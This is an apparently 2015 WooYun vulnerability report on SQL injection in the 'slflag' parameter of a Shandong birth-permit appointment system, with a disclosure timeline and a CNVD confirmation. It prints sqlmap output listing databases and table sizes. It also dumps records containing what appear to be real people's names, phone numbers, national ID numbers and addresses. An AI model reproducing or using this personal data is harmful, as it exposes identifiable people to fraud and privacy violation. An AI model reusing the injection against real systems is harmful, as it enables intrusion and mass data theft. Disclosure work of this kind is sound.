乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
山东省生育证预约系统sql注入数大量个人信息(看看哪些人要二胎)
**.**.**.**:8080/**.**.**.**:8080/Bzsq/syzList.aspx?dwdm=370000000000&slflag=2参数slflag存在注入漏洞
[18:06:26] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[18:06:26] [INFO] fetching database names[18:06:26] [INFO] the SQL query used returns 15 entries[18:06:26] [INFO] resumed: GAHJ_20140408[18:06:26] [INFO] resumed: GAHJ_20140626[18:06:26] [INFO] resumed: HJ_SWZXHJ[18:06:26] [INFO] resumed: master[18:06:26] [INFO] resumed: model[18:06:26] [INFO] resumed: msdb[18:06:26] [INFO] resumed: mz_12_13[18:06:26] [INFO] resumed: mz08-1209[18:06:26] [INFO] resumed: qmjk20140422[18:06:26] [INFO] resumed: ReportServer[18:06:26] [INFO] resumed: ReportServerTempDB[18:06:26] [INFO] resumed: tempdb[18:06:26] [INFO] resumed: wis_SX[18:06:26] [INFO] resumed: wissheng201403[18:06:26] [INFO] resumed: YHDJXT
Database: wis_SX+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| dbo.REP_SHADOW_GKB | 4566806 || dbo.gkb | 1690632 || dbo.Rep_LogTable | 1460029 || dbo.byzk | 1160478 || dbo.vbyzk | 1160477 || dbo.REP_SHADOW_JBQK | 1067527 |
Database: HJ_SWZXHJ+----------------------+---------+| Table | Entries |+----------------------+---------+| dbo.HJ_CZRKYW_SWZXHJ | 148743 |+----------------------+---------+
Database: YHDJXT+----------------+---------+| Table | Entries |+----------------+---------+| dbo.qh_bak0708 | 149006 || dbo.qh_bak0708 | 149006 || dbo.qhrz | 93152 || dbo.YHDJZMXX | 45152 || dbo.TBHZ | 4211 || dbo.userinfo | 2154 |
bz1 jbr lxdh yysj slsj fnxm zfxm sqsj lzrq fnhjd zfxjd zfhjd sqdbh fnxjd zfcsrq zfhkxz fnsfhm fnhkxz sldwmc fncsrq shyysj slflag zncsrq sldwdm znxb_2 zfdszn fndszn zfsfhm wisfnbm wisgldw不符合政策规定 宗文文 15094791788 2015-01-05—2015-01-08 01 6 2015 11:45AM 周文静 张贵祯 01 2 2015 9:06PM 01 6 2015 11:45AM 370983001006 370983111220 370983111220 201501010955126902 370983111220 01 21 1989 12:00AM 2 370983198711286181 1 山东省泰安市肥城市边院镇 11 28 1987 12:00AM NULL 3 03 6 2011 12:00AM 370983111000 NULL 2 2 370983198901216133 370983111220000360 370983111000重复办理服务手册。 玉皇庙计生办 13668810151 <blank> 01 6 2015 2:29PM 曲寿红 张广树 01 2 2015 9:19PM 01 6 2015 2:29PM <blank> <blank> <blank> 201501020921334367 <blank> 12 5 1991 12:00AM 2 370126199012055628 2 山东省济南市商河县玉皇庙镇 12 5 1990 12:00AM NULL 3 10 29 2014 12:00AM 370126105000 NULL 1 2 370126199112050015 370126000000129520 370126105000经核实可以办理 张金玲 13468460695 2015-01-27—2015-01-30 01 9 2015 2:46PM 马宁宁 张明 01 4 2015 3:10PM 01 9 2015 2:46PM <blank> <blank> <blank> 201501040312185472 <blank> 11 30 1983 12:00AM <blank> 370724198207183908 <blank> 山东省潍坊市潍城区北关街道办事处 07 18 1982 12:00AM NULL 2 04 5 2009 12:00AM 370702004000 NULL 1 2 371202198311305712 370702004425000387 370702004000
危害等级:高
漏洞Rank:13
确认时间:2015-11-20 14:33
CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。
暂无